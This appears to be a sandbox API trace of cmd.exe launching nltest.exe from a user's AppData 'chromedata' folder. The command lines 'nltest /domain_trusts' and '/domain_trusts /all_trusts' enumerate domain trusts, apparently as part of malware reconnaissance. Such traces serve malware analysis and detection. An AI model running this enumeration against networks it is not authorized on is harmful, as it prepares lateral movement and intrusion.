	[0249.583] _wcsicmp (_String1="nltest", _String2="RD") returned -4
	[0249.583] _wcsicmp (_String1="nltest", _String2="RMDIR") returned -4
	[0249.583] _wcsicmp (_String1="nltest", _String2="PATH") returned -2
	[0249.583] _wcsicmp (_String1="nltest", _String2="GOTO") returned 7
	[0249.583] _wcsicmp (_String1="nltest", _String2="SHIFT") returned -5
	[0249.583] _wcsicmp (_String1="nltest", _String2="CLS") returned 11
	[0249.583] _wcsicmp (_String1="nltest", _String2="CALL") returned 11
	[0249.583] _wcsicmp (_String1="nltest", _String2="VERIFY") returned -8
	[0249.583] _wcsicmp (_String1="nltest", _String2="VER") returned -8
	[0249.583] _wcsicmp (_String1="nltest", _String2="VOL") returned -8
	[0249.583] _wcsicmp (_String1="nltest", _String2="EXIT") returned 9
	[0249.583] _wcsicmp (_String1="nltest", _String2="SETLOCAL") returned -5
	[0249.583] _wcsicmp (_String1="nltest", _String2="ENDLOCAL") returned 9
	[0249.583] _wcsicmp (_String1="nltest", _String2="TITLE") returned -6
	[0249.584] _wcsicmp (_String1="nltest", _String2="START") returned -5
	[0249.584] _wcsicmp (_String1="nltest", _String2="DPATH") returned 10
	[0249.584] _wcsicmp (_String1="nltest", _String2="KEYS") returned 3
	[0249.584] _wcsicmp (_String1="nltest", _String2="MOVE") returned 1
	[0249.584] _wcsicmp (_String1="nltest", _String2="PUSHD") returned -2
	[0249.584] _wcsicmp (_String1="nltest", _String2="POPD") returned -2
	[0249.584] _wcsicmp (_String1="nltest", _String2="ASSOC") returned 13
	[0249.584] _wcsicmp (_String1="nltest", _String2="FTYPE") returned 8
	[0249.584] _wcsicmp (_String1="nltest", _String2="BREAK") returned 12
	[0249.584] _wcsicmp (_String1="nltest", _String2="COLOR") returned 11
	[0249.584] _wcsicmp (_String1="nltest", _String2="MKLINK") returned 1
	[0249.584] _wcsicmp (_String1="nltest", _String2="FOR") returned 8
	[0249.584] _wcsicmp (_String1="nltest", _String2="IF") returned 5
	[0249.584] _wcsicmp (_String1="nltest", _String2="REM") returned -4
	[0249.584] GetProcessHeap () returned 0x430000
	[0249.584] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x442b88
	[0249.584] GetProcessHeap () returned 0x430000
	[0249.584] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x36) returned 0x442da0
	[0249.584] _wcsnicmp (_String1="nlte", _String2="cmd ", _MaxCount=0x4) returned 11
	[0249.584] GetProcessHeap () returned 0x430000
	[0249.584] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x418) returned 0x4307f0
	[0249.584] SetErrorMode (uMode=0x0) returned 0x8001
	[0249.584] SetErrorMode (uMode=0x1) returned 0x0
	[0249.584] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4307f8, lpFilePart=0x2cee50 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x2cee50*="chromedata") returned 0x30
	[0249.584] SetErrorMode (uMode=0x8001) returned 0x1
	[0249.584] GetProcessHeap () returned 0x430000
	[0249.584] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4307f0, Size=0x78) returned 0x4307f0
	[0249.585] GetProcessHeap () returned 0x430000
	[0249.585] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4307f0) returned 0x78
	[0249.585] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0249.585] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0249.585] GetProcessHeap () returned 0x430000
	[0249.585] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17e) returned 0x442de0
	[0249.585] GetProcessHeap () returned 0x430000
	[0249.585] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2f4) returned 0x430870
	[0249.593] GetProcessHeap () returned 0x430000
	[0249.593] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x430870, Size=0x180) returned 0x430870
	[0249.593] GetProcessHeap () returned 0x430000
	[0249.593] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x430870) returned 0x180
	[0249.593] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0249.593] GetProcessHeap () returned 0x430000
	[0249.593] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe0) returned 0x442f68
	[0249.593] GetProcessHeap () returned 0x430000
	[0249.593] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x442f68, Size=0x76) returned 0x442f68
	[0249.593] GetProcessHeap () returned 0x430000
	[0249.593] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x442f68) returned 0x76
	[0249.594] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0249.594] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\nltest.*", fInfoLevelId=0x1, lpFindFileData=0x2cebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebcc) returned 0xffffffff
	[0249.594] GetLastError () returned 0x2
	[0249.595] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\nltest", fInfoLevelId=0x1, lpFindFileData=0x2cebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebcc) returned 0xffffffff
	[0249.595] GetLastError () returned 0x2
	[0249.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0249.595] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\nltest.*", fInfoLevelId=0x1, lpFindFileData=0x2cebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebcc) returned 0xffffffff
	[0249.595] GetLastError () returned 0x2
	[0249.595] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\nltest", fInfoLevelId=0x1, lpFindFileData=0x2cebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebcc) returned 0xffffffff
	[0249.595] GetLastError () returned 0x2
	[0249.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0249.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nltest.*", fInfoLevelId=0x1, lpFindFileData=0x2cebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebcc) returned 0x442fe8
	[0249.596] GetProcessHeap () returned 0x430000
	[0249.596] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x14) returned 0x443028
	[0249.596] FindClose (in: hFindFile=0x442fe8 | out: hFindFile=0x442fe8) returned 1
	[0249.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nltest.COM", fInfoLevelId=0x1, lpFindFileData=0x2cebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebcc) returned 0xffffffff
	[0249.596] GetLastError () returned 0x2
	[0249.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nltest.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebcc) returned 0x442fe8
	[0249.596] GetProcessHeap () returned 0x430000
	[0249.596] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x443028, Size=0x4) returned 0x443028
	[0249.596] FindClose (in: hFindFile=0x442fe8 | out: hFindFile=0x442fe8) returned 1
	[0249.596] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0249.596] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0249.596] GetConsoleTitleW (in: lpConsoleTitle=0x2cf0c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.597] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cef4c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf014 | out: lpAttributeList=0x2cef4c, lpSize=0x2cf014) returned 1
	[0249.597] UpdateProcThreadAttribute (in: lpAttributeList=0x2cef4c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf00c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cef4c, lpPreviousValue=0x0) returned 1
	[0249.597] GetStartupInfoW (in: lpStartupInfo=0x2cef08 | out: lpStartupInfo=0x2cef08*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x14c, hStdOutput=0x160, hStdError=0x160)) 
	[0249.597] GetProcessHeap () returned 0x430000
	[0249.597] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x18) returned 0x442fe8
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0249.597] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0249.598] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0249.598] GetProcessHeap () returned 0x430000
	[0249.598] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x442fe8 | out: hHeap=0x430000) returned 1
	[0249.598] GetProcessHeap () returned 0x430000
	[0249.598] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa) returned 0x43d558
	[0249.598] lstrcmpW (lpString1="\\nltest.exe", lpString2="\\XCOPY.EXE") returned -1
	[0249.599] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\nltest.exe", lpCommandLine="nltest  /domain_trusts", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpStartupInfo=0x2cefa8*(cb=0x48, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="nltest  /domain_trusts", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ceff4 | out: lpCommandLine="nltest  /domain_trusts", lpProcessInformation=0x2ceff4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xee8, dwThreadId=0xf18)) returned 1
	[0249.617] CloseHandle (hObject=0x4c) returned 1
	[0249.617] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0249.618] GetProcessHeap () returned 0x430000
	[0249.618] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x441f00 | out: hHeap=0x430000) returned 1
	[0249.618] GetEnvironmentStringsW () returned 0x441f00*
	[0249.618] GetProcessHeap () returned 0x430000
	[0249.618] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x97c) returned 0x4401d0
	[0249.618] FreeEnvironmentStringsW (penv=0x441f00) returned 1
	[0249.618] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0249.943] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ceee8 | out: lpExitCode=0x2ceee8*=0x1) returned 1
	[0249.943] CloseHandle (hObject=0x50) returned 1
	[0249.943] _vsnwprintf (in: _Buffer=0x2cf030, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ceef4 | out: _Buffer="00000001") returned 8
	[0249.943] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1
	[0249.943] GetProcessHeap () returned 0x430000
	[0249.943] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4401d0 | out: hHeap=0x430000) returned 1
	[0249.943] GetEnvironmentStringsW () returned 0x443038*
	[0249.943] GetProcessHeap () returned 0x430000
	[0249.943] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x9a2) returned 0x4401d0
	[0249.943] FreeEnvironmentStringsW (penv=0x443038) returned 1
	[0249.943] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0249.943] GetProcessHeap () returned 0x430000
	[0249.943] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4401d0 | out: hHeap=0x430000) returned 1
	[0249.943] GetEnvironmentStringsW () returned 0x443038*
	[0249.943] GetProcessHeap () returned 0x430000
	[0249.943] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x9a2) returned 0x4401d0
	[0249.943] FreeEnvironmentStringsW (penv=0x443038) returned 1
	[0249.943] GetProcessHeap () returned 0x430000
	[0249.943] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43d558 | out: hHeap=0x430000) returned 1
	[0249.943] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cef4c | out: lpAttributeList=0x2cef4c) 
	[0249.943] _get_osfhandle (_FileHandle=1) returned 0x160
	[0249.943] SetConsoleMode (hConsoleHandle=0x160, dwMode=0x0) returned 0
	[0249.943] _get_osfhandle (_FileHandle=1) returned 0x160
	[0249.943] GetConsoleMode (in: hConsoleHandle=0x160, lpMode=0x49e141ac | out: lpMode=0x49e141ac) returned 0
	[0249.943] _get_osfhandle (_FileHandle=0) returned 0x14c
	[0249.943] GetConsoleMode (in: hConsoleHandle=0x14c, lpMode=0x49e141b0 | out: lpMode=0x49e141b0) returned 0
	[0249.943] GetConsoleOutputCP () returned 0x1b5
	[0249.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0249.944] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0249.944] exit (_Code=1) 

Process:
	id = "57"
	image_name = "nltest.exe"
	filename = "c:\\windows\\system32\\nltest.exe"
	page_root = "0x7ee17840"
	os_pid = "0xee8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "56"
	os_parent_pid = "0xed0"
	cmd_line = "nltest  /domain_trusts"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 369
	os_tid = 0xf18


Thread:
	id = 371
	os_tid = 0x8bc


Process:
	id = "58"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17860"
	os_pid = "0xf1c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xa70"
	cmd_line = "/c nltest /domain_trusts /all_trusts"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 370
	os_tid = 0xf10

	[0249.979] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bf97c | out: lpSystemTimeAsFileTime=0x2bf97c*(dwLowDateTime=0x7c9bf380, dwHighDateTime=0x1d50a6a)) 
	[0249.979] GetCurrentProcessId () returned 0xf1c
	[0249.979] GetCurrentThreadId () returned 0xf10
	[0249.979] GetTickCount () returned 0xa94694
	[0249.979] QueryPerformanceCounter (in: lpPerformanceCount=0x2bf974 | out: lpPerformanceCount=0x2bf974*=32381713498) returned 1
	[0249.980] GetModuleHandleA (lpModuleName=0x0) returned 0x49df0000
	[0249.980] __set_app_type (_Type=0x1) 
	[0249.980] __p__fmode () returned 0x770231f4
	[0249.980] __p__commode () returned 0x770231fc
	[0249.980] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e121a6) returned 0x0
	[0249.980] __getmainargs (in: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c, _DoWildCard=0, _StartInfo=0x49e14140 | out: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c) returned 0
	[0249.980] GetCurrentThreadId () returned 0xf10
	[0249.980] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf10) returned 0x38
	[0249.980] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0249.980] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0249.980] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0249.980] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0249.980] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2bf90c | out: phkResult=0x2bf90c*=0x0) returned 0x2
	[0249.981] VirtualQuery (in: lpAddress=0x2bf943, lpBuffer=0x2bf8dc, dwLength=0x1c | out: lpBuffer=0x2bf8dc*(BaseAddress=0x2bf000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0249.981] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x2bf8dc, dwLength=0x1c | out: lpBuffer=0x2bf8dc*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0249.981] VirtualQuery (in: lpAddress=0x1c1000, lpBuffer=0x2bf8dc, dwLength=0x1c | out: lpBuffer=0x2bf8dc*(BaseAddress=0x1c1000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0249.981] VirtualQuery (in: lpAddress=0x1c3000, lpBuffer=0x2bf8dc, dwLength=0x1c | out: lpBuffer=0x2bf8dc*(BaseAddress=0x1c3000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0249.981] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x2bf8dc, dwLength=0x1c | out: lpBuffer=0x2bf8dc*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0249.981] GetConsoleOutputCP () returned 0x1b5
	[0249.981] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0249.981] SetConsoleCtrlHandler (HandlerRoutine=0x49e0e72a, Add=1) returned 1
	[0249.981] _get_osfhandle (_FileHandle=1) returned 0x154
	[0249.981] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0
	[0249.981] _get_osfhandle (_FileHandle=1) returned 0x154
	[0249.981] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x49e141ac | out: lpMode=0x49e141ac) returned 0
	[0249.981] _get_osfhandle (_FileHandle=0) returned 0x160
	[0249.981] GetConsoleMode (in: hConsoleHandle=0x160, lpMode=0x49e141b0 | out: lpMode=0x49e141b0) returned 0
	[0249.981] GetEnvironmentStringsW () returned 0x3a0230*
	[0249.981] GetProcessHeap () returned 0x390000
	[0249.981] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x8fa) returned 0x3a0b38
	[0249.981] FreeEnvironmentStringsW (penv=0x3a0230) returned 1
	[0249.981] GetProcessHeap () returned 0x390000
	[0249.982] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4) returned 0x39fb30
	[0249.982] GetEnvironmentStringsW () returned 0x3a0230*
	[0249.982] GetProcessHeap () returned 0x390000
	[0249.982] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x8fa) returned 0x3a1440
	[0249.982] FreeEnvironmentStringsW (penv=0x3a0230) returned 1
	[0249.982] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be87c | out: phkResult=0x2be87c*=0x40) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x0, lpData=0x2be888*=0xc0, lpcbData=0x2be880*=0x1000) returned 0x2
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x1, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x0, lpData=0x2be888*=0x1, lpcbData=0x2be880*=0x1000) returned 0x2
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x0, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x40, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x40, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x0, lpData=0x2be888*=0x40, lpcbData=0x2be880*=0x1000) returned 0x2
	[0249.982] RegCloseKey (hKey=0x40) returned 0x0
	[0249.982] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be87c | out: phkResult=0x2be87c*=0x40) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x0, lpData=0x2be888*=0x40, lpcbData=0x2be880*=0x1000) returned 0x2
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x1, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x0, lpData=0x2be888*=0x1, lpcbData=0x2be880*=0x1000) returned 0x2
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x0, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x9, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x4, lpData=0x2be888*=0x9, lpcbData=0x2be880*=0x4) returned 0x0
	[0249.982] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be884, lpData=0x2be888, lpcbData=0x2be880*=0x1000 | out: lpType=0x2be884*=0x0, lpData=0x2be888*=0x9, lpcbData=0x2be880*=0x1000) returned 0x2
